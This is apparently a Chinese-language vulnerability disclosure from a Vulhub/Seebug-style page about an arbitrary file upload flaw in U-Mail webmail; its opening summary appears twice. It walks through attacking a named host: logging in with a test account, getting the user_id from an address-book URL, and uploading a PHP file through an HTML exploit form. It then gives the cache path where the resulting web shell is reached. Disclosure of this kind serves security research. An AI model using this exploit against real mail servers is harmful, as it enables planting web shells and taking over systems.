VULHUB ™

### 简要描述： U-Mail存一处任意文件上传漏洞。 ### 详细说明： 先登录官方测试站点： [<img src="https://images.seebug.org/upload/201405/08204834d1cb069339f75f8b538298eb0ba28395.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/08204834d1cb069339f75f8b538298eb0ba28395.png) [<img src="https://images.seebug.org/upload/201405/08205739518546a8b7d8943bc4976009afab5e37.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/08205739518546a8b7d8943bc4976009afab5e37.png) 这里登录的账号为：mailtest3721 再获取当前登录用户的user_id http://mail.comingchina.com/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=mailtest3721 这里mailtest3721对应的user_id为:78609 [<img src="https://images.seebug.org/upload/201405/082051094cde3a27e6561649dac2e88d2d66f688.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/082051094cde3a27e6561649dac2e88d2d66f688.png)...

### 简要描述： U-Mail存一处任意文件上传漏洞。 ### 详细说明： 先登录官方测试站点： [<img src="https://images.seebug.org/upload/201405/08204834d1cb069339f75f8b538298eb0ba28395.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/08204834d1cb069339f75f8b538298eb0ba28395.png) [<img src="https://images.seebug.org/upload/201405/08205739518546a8b7d8943bc4976009afab5e37.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/08205739518546a8b7d8943bc4976009afab5e37.png) 这里登录的账号为：mailtest3721 再获取当前登录用户的user_id http://mail.comingchina.com/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=mailtest3721 这里mailtest3721对应的user_id为:78609 [<img src="https://images.seebug.org/upload/201405/082051094cde3a27e6561649dac2e88d2d66f688.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/082051094cde3a27e6561649dac2e88d2d66f688.png) html exp: ``` <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <FORM name=form1 method=post action="http://mail.comingchina.com/webmail/client/mail/index.php?module=operate&action=attach-upload" enctype=multipart/form-data> 上传文件：<input type="file" name="Filedata" size="30"> <INPUT type=submit value=上传 name=Submit> ``` 上传后获取"file_id":"13995534500" [<img src="https://images.seebug.org/upload/201405/08205254c565dc766a256924b714dc48e306f027.png" alt="3.php.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/08205254c565dc766a256924b714dc48e306f027.png) shell地址： http://mail.comingchina.com/webmail/client/cache/｛user_id｝/｛file_id｝.php 这里是： http://mail.comingchina.com/webmail/client/cache/78609/13995534500.php [<img src="https://images.seebug.org/upload/201405/08205649c321be81eb137616f04a48069cb7f15e.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/08205649c321be81eb137616f04a48069cb7f15e.png) ### 漏洞证明： 如上